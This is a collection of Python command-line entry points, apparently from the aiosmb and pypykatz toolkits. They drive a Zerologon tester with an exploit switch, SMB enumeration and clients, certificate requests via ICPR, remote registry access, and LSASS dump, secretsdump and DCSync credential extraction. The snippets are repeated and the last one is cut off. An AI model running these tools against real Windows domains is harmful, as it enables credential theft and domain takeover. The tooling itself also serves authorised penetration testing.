def main():
    """Command-line entry point: parse the options and run the event query.

    ``__banner__``, ``logger``, ``logging``, ``asyncio`` and ``amain`` are
    module-level names; only ``argparse`` is imported here.
    """
    import argparse

    ap = argparse.ArgumentParser(description='Event query example')
    ap.add_argument('-v', '--verbose', action='count', default=0)
    ap.add_argument('--src', default="Security", help='log source to query')
    ap.add_argument('-q', '--query', default="*", help='query string')
    ap.add_argument('-m', '--max_entries', type=int, default=100,
                    help='max element count to retrieve')
    # NOTE: the URL carries the credentials, so it ends up in shell history
    # and process listings like any other command-line argument.
    ap.add_argument(
        'smb_url',
        help=
        'Connection string that describes the authentication and target. Example: smb+ntlm-password://TEST\\Administrator:[email protected]'
    )

    opts = ap.parse_args()
    print(__banner__)

    # Any -v switches the module logger to DEBUG.
    if opts.verbose >= 1:
        logger.setLevel(logging.DEBUG)

    coro = amain(opts.smb_url,
                 src=opts.src,
                 query=opts.query,
                 max_entries=opts.max_entries)
    asyncio.run(coro)
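def main():
    """Command-line entry point of the Zerologon tester.

    Parses the options, configures logging from ``-v`` and runs the
    module-level ``run(dc_name, dc_ip, exploit)`` coroutine.  ``logger`` and
    ``asyncio`` are module-level names.
    """
    import argparse
    import logging
    from asysocks import logger as sockslogger

    parser = argparse.ArgumentParser(description='Zerologon tester')
    parser.add_argument('-v', '--verbose', action='count', default=0)
    parser.add_argument('-e',
                        '--exploit',
                        action='store_true',
                        help='perform the expolit')
    parser.add_argument('dc_ip', help='IP address of the domain controller')
    parser.add_argument(
        'dc_name', help='NETBIOS NAME of the domain controller (without $)')

    args = parser.parse_args()
    if args.verbose >= 1:
        logger.setLevel(logging.DEBUG)

    deep_debug = args.verbose > 2
    if deep_debug:
        print('setting deepdebug')
        logger.setLevel(1)  # enabling deep debug
        sockslogger.setLevel(1)
        logging.basicConfig(level=logging.DEBUG)

    # asyncio.run() creates its own event loop, so calling set_debug() on the
    # loop returned by get_event_loop() here never reached the loop that
    # actually executes run().  Pass the flag to asyncio.run() instead; None
    # keeps the PYTHONASYNCIODEBUG default when deep debug is off.
    asyncio.run(run(args.dc_name, args.dc_ip, args.exploit),
                debug=True if deep_debug else None)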
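def main():
	"""Command-line entry point of the Multiplexor auto collector.

	Builds a ``MultiplexorAutoStart`` from the parsed options, tunes the
	library loggers and runs it to completion.  ``logging``, ``asyncio``,
	``get_cpu_count``, ``msldaplogger``, ``smblogger`` and
	``MultiplexorAutoStart`` are module-level names.
	"""
	import argparse

	parser = argparse.ArgumentParser(description='auto collector for MP')
	parser.add_argument('-q', '--sqlite_folder_path', default='./workdir', help='A folder to store enumeration results in')
	# ws:// is a plaintext websocket; the default only ever talks to loopback.
	parser.add_argument('-m', '--multiplexor', default = 'ws://127.0.0.1:9999', help='multiplexor connection string in URL format')
	parser.add_argument('-p', '--parallel_cnt', default = get_cpu_count(), type=int, help='agent count')
	parser.add_argument('-o', '--progress-out-file', default = None, help='Filename to write progress to')
	parser.add_argument('-s', '--start-ui', action='store_true', help='Automatically start jackdaw UI after successful enumeration')

	args = parser.parse_args()

	# Root logger at DEBUG, then quiet the chatty libraries individually.
	logging.basicConfig(level=logging.DEBUG)
	msldaplogger.setLevel(logging.INFO)
	smblogger.setLevel(1)
	for noisy in ('websockets.server', 'websockets.client', 'websockets.protocol'):
		logging.getLogger(noisy).setLevel(logging.ERROR)
	# 100 is above CRITICAL: these two loggers are effectively silenced.
	for silenced in ('aiosmb', 'asysocks'):
		logging.getLogger(silenced).setLevel(100)

	mas = MultiplexorAutoStart(args.multiplexor, args.sqlite_folder_path, parallel_cnt=args.parallel_cnt, progress_file_name = args.progress_out_file, start_ui = args.start_ui)
	asyncio.run(mas.run())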
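def main():
	"""Command-line entry point of the interactive SMB client.

	Parses the options, prints the banner unless ``--silent``, configures
	logging from ``-v`` and runs the module-level ``amain(args)``.
	``__banner__``, ``logger``, ``sockslogger`` and ``asyncio`` are
	module-level names.
	"""
	import argparse
	import logging
	from asysocks import logger as asylogger

	parser = argparse.ArgumentParser(description='Interactive SMB client')
	parser.add_argument('-v', '--verbose', action='count', default=0)
	parser.add_argument('-s', '--silent', action='store_true', help='do not print banner')
	parser.add_argument('-n', '--no-interactive', action='store_true')
	# NOTE: the URL carries the credentials, so it ends up in shell history
	# and process listings like any other command-line argument.
	parser.add_argument('smb_url', help = 'Connection string that describes the authentication and target. Example: smb+ntlm-password://TEST\\Administrator:[email protected]')
	parser.add_argument('commands', nargs='*')

	args = parser.parse_args()
	if args.silent is False:
		print(__banner__)

	if args.verbose >= 1:
		logger.setLevel(logging.DEBUG)

	deep_debug = args.verbose > 2
	if deep_debug:
		print('setting deepdebug')
		logger.setLevel(1)  # enabling deep debug
		sockslogger.setLevel(1)
		asylogger.setLevel(1)
		logging.basicConfig(level=logging.DEBUG)

	# asyncio.run() creates its own event loop, so calling set_debug() on the
	# loop returned by get_event_loop() here never reached the loop that
	# actually runs amain().  Pass the flag to asyncio.run() instead; None
	# keeps the PYTHONASYNCIODEBUG default when deep debug is off.
	asyncio.run(amain(args), debug=True if deep_debug else None)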
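async def amain():
	"""Entry coroutine of the SMB protocol enumerator CLI.

	Builds an ``SMBProtocolEnum`` from the options and feeds it target
	generators: stdin (``--stdin`` with no positional targets), a file per
	positional target that can be opened, and a list of everything else,
	which is taken as a host name.  ``logger``, ``logging``, ``asyncio``,
	``SMBConnectionURL``, ``SMBProtocolEnum``, ``ListTargetGen`` and
	``FileTargetGen`` are module-level names.
	"""
	import argparse
	import sys

	parser = argparse.ArgumentParser(description='SMB Protocol enumerator. Tells which dialects suported by the remote end')
	parser.add_argument('-v', '--verbose', action='count', default=0)
	parser.add_argument('-w', '--smb-worker-count', type=int, default=100, help='Parallell count')
	parser.add_argument('-t', '--timeout', type=int, default=50, help='Timeout for each connection')
	parser.add_argument('--signing', action='store_true', help='Only check for the singing properties. (faster)')
	parser.add_argument('-s', '--stdin', action='store_true', help='Read targets from stdin')
	parser.add_argument('--json', action='store_true', help='Output in JSON format')
	parser.add_argument('--tsv', action='store_true', help='Output in TSV format. (TAB Separated Values)')
	parser.add_argument('--progress', action='store_true', help='Show progress bar')
	parser.add_argument('-o', '--out-file', help='Output file path.')
	parser.add_argument('targets', nargs='*', help = 'Hostname or IP address or file with a list of targets')
	args = parser.parse_args()

	if args.verbose >= 1:
		logger.setLevel(logging.INFO)

	if args.verbose > 2:
		logger.setLevel(1)  # enabling deep debug
		# Inside a coroutine get_event_loop() is the running loop, so the
		# debug flag really applies here.
		asyncio.get_event_loop().set_debug(True)
		logging.basicConfig(level=logging.DEBUG)

	# --tsv takes precedence when both --json and --tsv are given.
	output_type = 'str'
	if args.json is True:
		output_type = 'json'
	if args.tsv is True:
		output_type = 'tsv'

	# Fixed URL with placeholder credentials; the hosts actually probed come
	# from the target generators appended below.
	smb_url = SMBConnectionURL('smb2+ntlm-password://dummy\\dummy:[email protected]')
	enumerator = SMBProtocolEnum(smb_url, worker_count = args.smb_worker_count, timeout = args.timeout, only_signing = args.signing, show_pbar=args.progress, out_file=args.out_file, output_type=output_type)

	notfile = []
	if len(args.targets) == 0 and args.stdin is True:
		enumerator.target_gens.append(ListTargetGen(sys.stdin))
	else:
		for target in args.targets:
			# A target that opens as a file is a target list; one that cannot
			# be opened (missing, unreadable, a directory) is taken as a host.
			# Only OSError is swallowed: Ctrl-C and genuine bugs (including a
			# failing FileTargetGen) now surface instead of silently turning
			# the path into a host name, as the former bare except did.
			try:
				with open(target, 'r'):
					pass
			except OSError:
				notfile.append(target)
			else:
				enumerator.target_gens.append(FileTargetGen(target))

	if len(notfile) > 0:
		enumerator.target_gens.append(ListTargetGen(notfile))

	if len(enumerator.target_gens) == 0:
		print('[-] No suitable targets were found!')
		return

	await enumerator.run()
	if args.progress is False:
		print('[+] Done!')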
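async def amain():
	"""Entry coroutine of the SMB protocol enumerator CLI.

	Builds an ``SMBProtocolEnum`` from the options and feeds it target
	generators: stdin (``--stdin`` with no positional targets), a file per
	positional target that can be opened, and a list of everything else,
	which is taken as a host name.  ``logger``, ``logging``, ``asyncio``,
	``SMBProtocolEnum``, ``ListTargetGen`` and ``FileTargetGen`` are
	module-level names.
	"""
	import argparse
	import sys

	parser = argparse.ArgumentParser(description='SMB Protocol enumerator. Tells which dialects suported by the remote end')
	parser.add_argument('-v', '--verbose', action='count', default=0)
	parser.add_argument('-w', '--smb-worker-count', type=int, default=100, help='Parallell count')
	parser.add_argument('-t', '--timeout', type=int, default=50, help='Timeout for each connection')
	parser.add_argument('--signing', action='store_true', help='Only check for the singing properties. (faster)')
	parser.add_argument('-s', '--stdin', action='store_true', help='Read targets from stdin')
	parser.add_argument('targets', nargs='*', help = 'Hostname or IP address or file with a list of targets')
	args = parser.parse_args()

	if args.verbose >= 1:
		logger.setLevel(logging.DEBUG)

	if args.verbose > 2:
		print('setting deepdebug')
		logger.setLevel(1)  # enabling deep debug
		# Inside a coroutine get_event_loop() is the running loop, so the
		# debug flag really applies here.
		asyncio.get_event_loop().set_debug(True)
		logging.basicConfig(level=logging.DEBUG)

	enumerator = SMBProtocolEnum(worker_count = args.smb_worker_count, timeout = args.timeout, only_signing = args.signing)

	notfile = []
	if len(args.targets) == 0 and args.stdin is True:
		enumerator.target_gens.append(ListTargetGen(sys.stdin))
	else:
		for target in args.targets:
			# A target that opens as a file is a target list; one that cannot
			# be opened (missing, unreadable, a directory) is taken as a host.
			# Only OSError is swallowed: Ctrl-C and genuine bugs (including a
			# failing FileTargetGen) now surface instead of silently turning
			# the path into a host name, as the former bare except did.
			try:
				with open(target, 'r'):
					pass
			except OSError:
				notfile.append(target)
			else:
				enumerator.target_gens.append(FileTargetGen(target))

	if len(notfile) > 0:
		enumerator.target_gens.append(ListTargetGen(notfile))

	if len(enumerator.target_gens) == 0:
		print('[-] No suitable targets were found!')
		return

	await enumerator.run()
	print('[+] Done!')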
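def main():
	"""Command-line entry point of the interactive SMB client.

	Prints the banner, configures logging from ``-v`` and runs the
	module-level ``amain(args)``.  ``__banner__``, ``logger``,
	``sockslogger`` and ``asyncio`` are module-level names.
	"""
	import argparse
	import logging

	parser = argparse.ArgumentParser(description='Interactive SMB client')
	parser.add_argument('-v', '--verbose', action='count', default=0)
	parser.add_argument('-n', '--no-interactive', action='store_true')
	# NOTE: the URL carries the credentials, so it ends up in shell history
	# and process listings like any other command-line argument.
	parser.add_argument('smb_url', help = 'Connection string that describes the authentication and target. Example: smb+ntlm-password://TEST\\Administrator:[email protected]')
	parser.add_argument('commands', nargs='*')

	args = parser.parse_args()
	print(__banner__)

	# -v and -vv used to be accepted but ignored (only -vvv did anything);
	# a single -v now switches the module logger to DEBUG, as in the
	# sibling client entry point.
	if args.verbose >= 1:
		logger.setLevel(logging.DEBUG)

	if args.verbose > 2:
		print('setting deepdebug')
		logger.setLevel(1)  # enabling deep debug
		sockslogger.setLevel(1)

	# Echo the scripted commands before the session starts.
	print(args.commands)

	asyncio.run(amain(args))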
def main():
	"""Command-line entry point: request a certificate via the ICPR RPC service.

	Parses the options and hands them positionally to the module-level
	``amain``.  ``__banner__``, ``logger``, ``logging`` and ``asyncio`` are
	module-level names.
	"""
	import argparse

	ap = argparse.ArgumentParser(description='Request certificate via ICPR-RPC service')
	ap.add_argument('-v', '--verbose', action='count', default=0)
	ap.add_argument('--pfx-file', help = 'Output PFX file name. Default is cert_<rand>.pfx')
	# 'admin' is only a placeholder default for the PFX password; set a real
	# one for anything you intend to keep.
	ap.add_argument('--pfx-pass', default = 'admin', help = 'Ouput PFX file password')
	ap.add_argument('--alt-name', help = 'Alternate username. Preferable username@FQDN format')
	ap.add_argument('--cn', help = 'CN (common name). In case you want to set it to something custom. Preferable username@FQDN format')

	enroll = ap.add_argument_group('Agent enrollment parameters')
	enroll.add_argument('--on-behalf', help = 'On behalf username')
	enroll.add_argument('--enroll-cert', help = 'Agent enrollment PFX file')
	enroll.add_argument('--enroll-pass', help = 'Agent enrollment PFX file password')

	ap.add_argument('smb_url', help = 'Connection string that describes the authentication and target. Example: smb+ntlm-password://TEST\\Administrator:[email protected]')
	ap.add_argument('service', help = 'Enrollment service endpoint')
	ap.add_argument('template', help = 'Certificate template name to use')

	opts = ap.parse_args()
	print(__banner__)

	# Any -v switches the module logger to DEBUG.
	if opts.verbose >= 1:
		logger.setLevel(logging.DEBUG)

	coro = amain(
		opts.smb_url,
		opts.service,
		opts.template,
		opts.alt_name,
		opts.on_behalf,
		opts.cn,
		opts.pfx_file,
		opts.pfx_pass,
		opts.enroll_cert,
		opts.enroll_pass,
	)
	asyncio.run(coro)
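def main():
	"""Command-line entry point of the SMB file downloader.

	Parses the options and runs the module-level ``amain(url, out_file)``.
	``logger``, ``logging`` and ``asyncio`` are module-level names.
	"""
	import argparse

	parser = argparse.ArgumentParser(description='SMB file downloader')
	parser.add_argument('-v', '--verbose', action='count', default=0)
	# NOTE(review): --progress is parsed but not forwarded to amain() here.
	parser.add_argument('--progress', action='store_true', help='Show progress')
	parser.add_argument('-o', '--out-file', help='Output file name. Optional.')
	parser.add_argument('url', help='SMB URL with full file path. Example: smb2+ntlm-password://TEST\\Administrator:[email protected]/C$/test.txt')

	args = parser.parse_args()

	if args.verbose >= 1:
		logger.setLevel(logging.DEBUG)

	deep_debug = args.verbose > 2
	if deep_debug:
		print('setting deepdebug')
		logger.setLevel(1)  # enabling deep debug
		logging.basicConfig(level=logging.DEBUG)

	# asyncio.run() creates its own event loop, so calling set_debug() on the
	# loop returned by get_event_loop() here never reached the loop that
	# actually runs amain().  Pass the flag to asyncio.run() instead; None
	# keeps the PYTHONASYNCIODEBUG default when deep debug is off.
	asyncio.run(amain(args.url, args.out_file), debug=True if deep_debug else None)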
    async def run_live(self, args):
        """Run a "live" SMB command using the current Windows logon session.

        Only the ``console`` sub-command (``args.livesmbcommand``) is handled.
        Raises ``Exception`` on non-Windows hosts.  ``platform``, ``logging``
        and ``SMBCMDArgs`` are module-level names; the heavier imports are
        deferred until they are needed.
        """
        if platform.system().lower() != 'windows':
            raise Exception('Live commands only work on Windows!')

        from aiosmb import logger as smblog

        # -v mapping for aiosmb: 0 silences it (100 is above CRITICAL),
        # 1 is INFO, anything higher becomes 5 - v (2 -> 3, 3 -> 2, ...).
        verbosity = args.verbose
        if verbosity == 0:
            smblog.setLevel(100)
        elif verbosity == 1:
            smblog.setLevel(level=logging.INFO)
        else:
            smblog.setLevel(level=5 - verbosity)

        if args.livesmbcommand != 'console':
            return

        from aiosmb.examples.smbclient import amain
        from winacl.functions.highlevel import get_logon_info

        info = get_logon_info()
        client_args = SMBCMDArgs()
        # sspi scheme: the session's own domain/username go into the URL and
        # no password is carried on the command line.
        client_args.smb_url = 'smb%s+sspi-%s://%s\\%s@%s' % (
            args.protocol_version, args.authmethod, info['domain'],
            info['username'], args.host)
        client_args.verbose = args.verbose

        if args.commands is not None and len(args.commands) > 0:
            if args.commands[0] == 'help':
                client_args.commands = ['help']
            else:
                # Make sure a session exists before the user's commands run.
                client_args.commands = []
                if args.commands[0] != 'login':
                    client_args.commands.append('login')
                client_args.commands.extend(args.commands)

        await amain(client_args)
    async def run_live(self, args):
        """Run a "live" SMB command using the current Windows logon session.

        Handles the ``console`` and ``shareenum`` sub-commands
        (``args.livesmbcommand``).  Raises ``Exception`` on non-Windows
        hosts.  ``platform``, ``logging`` and ``SMBCMDArgs`` are module-level
        names; the heavier imports are deferred into the branch that needs
        them.
        """
        if platform.system().lower() != 'windows':
            raise Exception('Live commands only work on Windows!')

        from aiosmb import logger as smblog

        # -v mapping for aiosmb: 0 silences it (100 is above CRITICAL),
        # 1 is INFO, anything higher becomes 5 - v (2 -> 3, 3 -> 2, ...).
        verbosity = args.verbose
        if verbosity == 0:
            smblog.setLevel(100)
        elif verbosity == 1:
            smblog.setLevel(level=logging.INFO)
        else:
            smblog.setLevel(level=5 - verbosity)

        subcommand = args.livesmbcommand

        if subcommand == 'console':
            from aiosmb.examples.smbclient import amain
            from winacl.functions.highlevel import get_logon_info

            info = get_logon_info()
            client_args = SMBCMDArgs()
            # sspi scheme: the session's own domain/username go into the URL
            # and no password is carried on the command line.
            client_args.smb_url = 'smb%s+sspi-%s://%s\\%s@%s' % (
                args.protocol_version, args.authmethod, info['domain'],
                info['username'], args.host)
            client_args.verbose = args.verbose

            if args.commands is not None and len(args.commands) > 0:
                if args.commands[0] == 'help':
                    client_args.commands = ['help']
                else:
                    # Make sure a session exists before the user's commands run.
                    client_args.commands = []
                    if args.commands[0] != 'login':
                        client_args.commands.append('login')
                    client_args.commands.extend(args.commands)

            await amain(client_args)

        elif subcommand == 'shareenum':
            from pypykatz.smb.shareenum import shareenum

            # --tsv wins over --json when both are set.
            if args.tsv is True:
                output_type = 'tsv'
            elif args.json is True:
                output_type = 'json'
            else:
                output_type = 'str'

            # argparse yields None when an exclusion list was not given.
            exclude_share = [] if args.es is None else args.es
            exclude_dir = [] if args.ed is None else args.ed
            exclude_target = [] if args.et is None else args.et

            # 'auto' is passed through unless --skip-ldap turns LDAP off.
            ldap_url = None if args.skip_ldap is True else 'auto'

            await shareenum(
                smb_url='auto',
                targets=args.target,
                smb_worker_count=args.worker_count,
                depth=args.depth,
                out_file=args.out_file,
                progress=args.progress,
                max_items=args.maxitems,
                dirsd=args.dirsd,
                filesd=args.filesd,
                authmethod=args.authmethod,
                protocol_version=args.protocol_version,
                output_type=output_type,
                max_runtime=args.max_runtime,
                exclude_share=exclude_share,
                exclude_dir=exclude_dir,
                ldap_url=ldap_url,
                exclude_target=exclude_target,
            )
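async def amain():
    """Entry coroutine of the registry-over-SMB CLI.

    Parses the connection URL and the commands, logs in, makes sure the
    RemoteRegistry service is running on the target (it is started when it
    is stopped and is not stopped again afterwards), then runs each command
    through the remote registry API.  ``logger``, ``asyncio``,
    ``SMBConnectionParams``, ``SMBConnectionURL``, ``SMBMachine``,
    ``SMBServiceStatus`` and ``SMBREG_COMMAND`` are module-level names.
    """
    import argparse
    import sys
    import logging

    parser = argparse.ArgumentParser(
        description='Registry manipulation via SMB')
    SMBConnectionParams.extend_parser(parser)
    parser.add_argument('-v', '--verbose', action='count', default=0)
    parser.add_argument(
        'url',
        help=
        'Connection URL base, target can be set to anything. Owerrides all parameter based connection settings! Example: "smb2+ntlm-password://TEST\\victim@test"'
    )
    # Raw string: the backslashes are literal registry path separators.  None
    # of them formed a valid escape, so the text is unchanged, but a plain
    # literal triggers "invalid escape sequence" warnings on newer Pythons.
    parser.add_argument(
        'commands',
        nargs='*',
        help=
        r'Commands in the following format: "r:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest:Negotiate"'
    )

    args = parser.parse_args()

    if args.verbose >= 1:
        logger.setLevel(logging.DEBUG)

    if args.verbose > 2:
        print('setting deepdebug')
        logger.setLevel(1)  # enabling deep debug
        # Inside a coroutine get_event_loop() is the running loop, so the
        # debug flag really applies here.
        asyncio.get_event_loop().set_debug(True)
        logging.basicConfig(level=logging.DEBUG)

    # `url` is a positional argument, so the parameter-based fallback is only
    # reachable if argparse ever yields None for it; kept for compatibility.
    smb_url = None
    if args.url is not None:
        smb_url = args.url
    else:
        try:
            smb_url = SMBConnectionParams.parse_args(args)
        except Exception as e:
            print(
                'Either URL or all connection parameters must be set! Error: %s'
                % str(e))
            sys.exit(1)

    # Pre-parse every command so a malformed one is rejected with a message
    # before any network activity, instead of a traceback half-way through
    # the batch.  Both a missing ':' and an unknown command name raise
    # ValueError (the latter assuming SMBREG_COMMAND is an Enum).
    commands = []
    for cmd in args.commands:
        try:
            c, path = cmd.split(':', 1)
            commands.append((SMBREG_COMMAND(c.upper()), path))
        except ValueError as e:
            print('Invalid command "%s": %s' % (cmd, str(e)))
            sys.exit(1)

    connection = SMBConnectionURL(smb_url).get_connection()
    _, err = await connection.login()
    if err is not None:
        print('Login failed! Reason: %s' % str(err))
        return
    machine = SMBMachine(connection)

    registry_srv_status, err = await machine.check_service_status(
        "RemoteRegistry")
    if err is not None:
        print('Check service status error! %s' % err)
        return

    if registry_srv_status != SMBServiceStatus.RUNNING:
        # Side effect on the target: the service is left running afterwards.
        logger.info('RemoteRegistry is not running! Starting it now..')
        res, err = await machine.enable_service("RemoteRegistry")
        if err is not None:
            print(err)
            return
        await asyncio.sleep(5)  # waiting for service to start up

    reg_api, err = await machine.get_regapi()
    if err is not None:
        print(err)
        return

    for cmd, target in commands:
        if cmd == SMBREG_COMMAND.READ:
            # READ targets are "<key path>:<value name>".
            regpath, name = target.split(':', 1)
            hkey, err = await reg_api.OpenRegPath(regpath)
            if err is not None:
                print(err)
                continue

            val_type, value, err = await reg_api.QueryValue(hkey, name)
            if err is not None:
                print(err)
                continue
            print(value)

        elif cmd == SMBREG_COMMAND.ENUMVALUE:
            hkey, err = await reg_api.OpenRegPath(target)
            if err is not None:
                print(err)
                continue

            # Enumerate by index until the API reports an error; the error
            # that ends the enumeration is printed as-is.
            i = 0
            while True:
                value_name, value_type, value_data, err = await reg_api.EnumValue(
                    hkey, i)
                i += 1
                if err is not None:
                    print(err)
                    break
                print(value_name)
                print(value_type)
                print(value_data)

        elif cmd == SMBREG_COMMAND.ENUMKEY:
            hkey, err = await reg_api.OpenRegPath(target)
            if err is not None:
                print(err)
                continue

            # Same termination rule as ENUMVALUE above.
            i = 0
            while True:
                res, err = await reg_api.EnumKey(hkey, i)
                i += 1
                if err is not None:
                    print(err)
                    break

                print(res)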
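	async def run(self, args):
		"""Dispatch the ``smb`` sub-command selected by ``args.smb_module``.

		Supported modules: lsassfile, lsassdump, secretsdump, dcsync, regdump,
		regfile, shareenum and client.  Results go to ``args.outfile`` when it
		is set, otherwise to stdout (JSON when ``args.json`` is set).
		``logging``, ``json``, ``UniversalEncoder`` and ``SMBCMDArgs`` are
		module-level names; per-module imports are deferred into their branch.
		"""

		from aiosmb import logger as smblog

		# -v mapping for aiosmb: 0 silences it (100 is above CRITICAL),
		# 1 is INFO, anything higher becomes 5 - v (2 -> 3, 3 -> 2, ...).
		if args.verbose == 0:
			smblog.setLevel(100)
		elif args.verbose == 1:
			smblog.setLevel(level=logging.INFO)
		else:
			level = 5 - args.verbose
			smblog.setLevel(level=level)

		def _emit_registry(po, outpath):
			"""Write a registry result to outpath if truthy, else print it (JSON or text)."""
			if po is None:
				return
			if outpath:
				po.to_file(outpath, args.json)
			elif args.json:
				print(json.dumps(po.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True))
			else:
				print(str(po))

		async def _emit_secrets(secrets, outpath):
			"""Stream dcsync secrets to outpath (None means stdout).

			The with-block guarantees the file is closed even when the
			iterator raises, and a failed open() can no longer leave the file
			variable unbound for a later close().
			"""
			if outpath is None:
				async for secret in secrets:
					print(str(secret))
				return
			with open(outpath, 'w', newline = '') as outfile:
				async for secret in secrets:
					outfile.write(str(secret))

		if args.smb_module == 'lsassfile':
			from pypykatz.smb.lsassutils import lsassfile
			mimi = await lsassfile(args.url, chunksize=args.chunksize, packages=args.packages)
			self.process_results({'smbfile':mimi}, [], args)

		elif args.smb_module == 'lsassdump':
			from pypykatz.smb.lsassutils import lsassdump
			mimi = await lsassdump(args.url, chunksize=args.chunksize, packages=args.packages)
			self.process_results({'smbfile':mimi}, [], args)

		elif args.smb_module == 'secretsdump':
			from pypykatz.smb.lsassutils import lsassdump
			from pypykatz.smb.regutils import regdump
			from pypykatz.smb.dcsync import dcsync

			# The three stages are independent: a failure is logged with its
			# traceback and the next stage still runs.
			try:
				mimi = await lsassdump(args.url, chunksize=args.chunksize, packages=args.packages)
				if mimi is not None:
					self.process_results({'smbfile':mimi}, [], args, file_prefix='_lsass.txt')
			except Exception:
				logging.exception('[SECRETSDUMP] Failed to get LSASS secrets')

			try:
				# Registry output honours the truthiness of args.outfile.
				registry_out = args.outfile+'_registry.txt' if args.outfile else None
				_emit_registry(await regdump(args.url), registry_out)
			except Exception:
				logging.exception('[SECRETSDUMP] Failed to get registry secrets')

			try:
				# DCSYNC output honours "is not None" (an empty string still
				# yields a file named '_dcsync.txt'), as before.
				dcsync_out = args.outfile+'_dcsync.txt' if args.outfile is not None else None
				await _emit_secrets(dcsync(args.url), dcsync_out)
			except Exception:
				logging.exception('[SECRETSDUMP] Failed to perform DCSYNC')

		elif args.smb_module == 'dcsync':
			from pypykatz.smb.dcsync import dcsync
			await _emit_secrets(dcsync(args.url, args.username), args.outfile)

		elif args.smb_module == 'regdump':
			from pypykatz.smb.regutils import regdump
			_emit_registry(await regdump(args.url), args.outfile)

		elif args.smb_module == 'regfile':
			from pypykatz.smb.regutils import regfile
			po = await regfile(args.url, args.system, sam = args.sam, security = args.security, software = args.software)
			_emit_registry(po, args.outfile)

		elif args.smb_module == 'shareenum':
			from pypykatz.smb.shareenum import shareenum

			# --tsv wins over --json when both are set.
			output_type = 'str'
			if args.json is True:
				output_type = 'json'
			if args.tsv is True:
				output_type = 'tsv'

			# argparse yields None when an exclusion list was not given.
			exclude_share = [] if args.es is None else args.es
			exclude_dir = [] if args.ed is None else args.ed
			exclude_target = [] if args.et is None else args.et

			await shareenum(
				args.smb_url,
				targets = args.target,
				smb_worker_count = args.worker_count,
				depth = args.depth,
				out_file = args.out_file,
				progress = args.progress,
				max_items = args.maxitems,
				dirsd = args.dirsd,
				filesd = args.filesd,
				output_type = output_type,
				max_runtime = args.max_runtime,
				exclude_share = exclude_share,
				exclude_dir = exclude_dir,
				ldap_url = args.ldap,
				exclude_target = exclude_target,
			)

		elif args.smb_module == 'client':
			from aiosmb.examples.smbclient import amain
			la = SMBCMDArgs()
			la.smb_url = args.url
			la.verbose = args.verbose
			if args.commands is not None and len(args.commands) > 0:
				if args.commands[0] == 'help':
					la.commands = ['help']
				else:
					# Make sure a session exists before the user's commands run.
					la.commands = []
					if args.commands[0] != 'login':
						la.commands.append('login')
					la.commands.extend(args.commands)

			await amain(la)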
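	async def run_live(self, args):
		"""Dispatch a "live" SMB sub-command using the current Windows logon.

		Raises ``Exception`` on non-Windows hosts.  For every sub-command
		except shareenum the SMB URL is built with the ``sspi`` scheme from
		the interactive session's domain/username, so no password is carried
		on the command line.  Handles client, lsassdump, secretsdump, dcsync,
		regdump and shareenum (``args.livesmbcommand``).  Results go to
		``args.outfile`` when set, otherwise to stdout (JSON when
		``args.json`` is set).  ``platform``, ``logging``, ``json``,
		``UniversalEncoder`` and ``SMBCMDArgs`` are module-level names.
		"""
		if platform.system().lower() != 'windows':
			raise Exception('Live commands only work on Windows!')

		from aiosmb import logger as smblog
		from winacl.functions.highlevel import get_logon_info

		info = get_logon_info()
		# shareenum passes smb_url='auto' below and never reads this variable.
		if args.livesmbcommand != 'shareenum':
			smb_url = 'smb%s+sspi-%s://%s\\%s@%s' % (args.protocol_version, args.authmethod, info['domain'], info['username'], args.host)

		# -v mapping for aiosmb: 0 silences it (100 is above CRITICAL),
		# 1 is INFO, anything higher becomes 5 - v (2 -> 3, 3 -> 2, ...).
		if args.verbose == 0:
			smblog.setLevel(100)
		elif args.verbose == 1:
			smblog.setLevel(level=logging.INFO)
		else:
			level = 5 - args.verbose
			smblog.setLevel(level=level)

		def _emit_registry(po, outpath):
			"""Write a registry result to outpath if truthy, else print it (JSON or text)."""
			if po is None:
				return
			if outpath:
				po.to_file(outpath, args.json)
			elif args.json:
				print(json.dumps(po.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True))
			else:
				print(str(po))

		async def _emit_secrets(secrets, outpath):
			"""Stream dcsync secrets to outpath (None means stdout).

			The with-block guarantees the file is closed even when the
			iterator raises, and a failed open() can no longer leave the file
			variable unbound for a later close().
			"""
			if outpath is None:
				async for secret in secrets:
					print(str(secret))
				return
			with open(outpath, 'w', newline = '') as outfile:
				async for secret in secrets:
					outfile.write(str(secret))

		if args.livesmbcommand == 'client':
			from aiosmb.examples.smbclient import amain

			la = SMBCMDArgs()
			la.smb_url = smb_url
			la.verbose = args.verbose

			if args.commands is not None and len(args.commands) > 0:
				if args.commands[0] == 'help':
					la.commands = ['help']
				else:
					# Make sure a session exists before the user's commands run.
					la.commands = []
					if args.commands[0] != 'login':
						la.commands.append('login')
					la.commands.extend(args.commands)

			await amain(la)

		elif args.livesmbcommand == 'lsassdump':
			from pypykatz.smb.lsassutils import lsassdump
			mimi = await lsassdump(smb_url, chunksize=args.chunksize, packages=args.packages)
			self.process_results({'smbfile':mimi}, [], args)

		elif args.livesmbcommand == 'secretsdump':
			from pypykatz.smb.lsassutils import lsassdump
			from pypykatz.smb.regutils import regdump
			from pypykatz.smb.dcsync import dcsync

			# The three stages are independent: a failure is logged with its
			# traceback and the next stage still runs.
			try:
				mimi = await lsassdump(smb_url, chunksize=args.chunksize, packages=args.packages)
				if mimi is not None:
					self.process_results({'smbfile':mimi}, [], args, file_prefix='_lsass.txt')
			except Exception:
				logging.exception('[SECRETSDUMP] Failed to get LSASS secrets')

			try:
				# Registry output honours the truthiness of args.outfile.
				registry_out = args.outfile+'_registry.txt' if args.outfile else None
				_emit_registry(await regdump(smb_url), registry_out)
			except Exception:
				logging.exception('[SECRETSDUMP] Failed to get registry secrets')

			try:
				# DCSYNC output honours "is not None" (an empty string still
				# yields a file named '_dcsync.txt'), as before.
				dcsync_out = args.outfile+'_dcsync.txt' if args.outfile is not None else None
				await _emit_secrets(dcsync(smb_url), dcsync_out)
			except Exception:
				logging.exception('[SECRETSDUMP] Failed to perform DCSYNC')

		elif args.livesmbcommand == 'dcsync':
			from pypykatz.smb.dcsync import dcsync
			await _emit_secrets(dcsync(smb_url, args.username), args.outfile)

		elif args.livesmbcommand == 'regdump':
			from pypykatz.smb.regutils import regdump
			_emit_registry(await regdump(smb_url), args.outfile)

		elif args.livesmbcommand == 'shareenum':
			from pypykatz.smb.shareenum import shareenum

			# --tsv wins over --json when both are set.
			output_type = 'str'
			if args.json is True:
				output_type = 'json'
			if args.tsv is True:
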